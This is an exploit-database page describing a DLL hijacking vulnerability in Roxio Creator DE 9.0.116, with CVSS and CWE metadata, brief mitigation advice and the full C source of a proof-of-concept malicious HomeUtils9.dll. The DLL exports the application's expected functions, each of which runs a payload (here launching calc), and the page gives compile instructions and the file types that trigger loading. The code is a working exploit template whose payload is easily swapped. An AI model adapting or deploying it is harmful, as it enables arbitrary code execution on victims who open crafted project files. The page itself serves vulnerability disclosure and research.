header-logo
Suggest Exploit
vendor:
Roxio Creator DE
by:
storm
7.5
CVSS
HIGH
DLL Hijacking
426
CWE
Product Name: Roxio Creator DE
Affected Version From: 9.0.116
Affected Version To: Other versions are very possibly exploitable too
Patch Exists: NO
Related CWE:
CPE: a:roxio:creator_de
Metasploit:
Other Scripts:
Platforms Tested: Windows Vista SP2
2010

Roxio Creator DE DLL Hijacking Exploit (HomeUtils9.dll)

This exploit allows an attacker to hijack the HomeUtils9.dll file in Roxio Creator DE. By exploiting this vulnerability, an attacker can execute arbitrary code with the privileges of the user running the affected software.

Mitigation:

Update to a patched version of Roxio Creator DE. Avoid opening untrusted .c2d, .gi, and .roxio files.
Source

Exploit-DB raw data:

/*

Exploit Title: Roxio Creator DE DLL Hijacking Exploit (HomeUtils9.dll)
Date: August 25, 2010
Author: storm (storm@gonullyourself.org)
Version:  9.0.116 - Other versions are very possibly exploitable too
Tested on: Windows Vista SP2

http://www.gonullyourself.org/

gcc -shared -o HomeUtils9.dll Roxio-DLL.c

.c2d, .gi, and .roxio files are affected.

*/

#include <windows.h>
#define DllExport __declspec (dllexport)

DllExport void Dispatch_InvokeUpdate() { hax(); }
DllExport void GetCertificateItemValue() { hax(); }
DllExport void GetFeatureEnabled() { hax(); }
DllExport void GetFeatureEnabledGroup() { hax(); }
DllExport void GetFeatureGroup() { hax(); }
DllExport void GetFeatureGroupActivationDetail() { hax(); }
DllExport void GetRoxioKeyContents() { hax(); }
DllExport void LaunchPermission() { hax(); }
DllExport void LaunchPermission_Str() { hax(); }
DllExport void SAR_Dispatch_ActivateComponent() { hax(); }
DllExport void SAR_Dispatch_ActivateProduct() { hax(); }
DllExport void SAR_Dispatch_ActivateProductGroup() { hax(); }
DllExport void SAR_Dispatch_DoRegister() { hax(); }
DllExport void SAR_Dispatch_GetActivationDetail() { hax(); }
DllExport void SAR_Dispatch_IncrementUsage() { hax(); }
DllExport void SAR_Dispatch_IsActivated() { hax(); }
DllExport void SAR_Dispatch_IsRegistered() { hax(); }
DllExport void SAR_Dispatch_ReleaseActivation() { hax(); }
DllExport void SAR_GetCDKey() { hax(); }
DllExport void SAR_UsePermissionsCache() { hax(); }
DllExport void Upgrade() { hax(); }
DllExport void UseCodecPermission() { hax(); }

int hax()
{
  WinExec("calc", 0);
  exit(0);
  return 0;
}

Navigation

Suggest Exploit

Services By CQR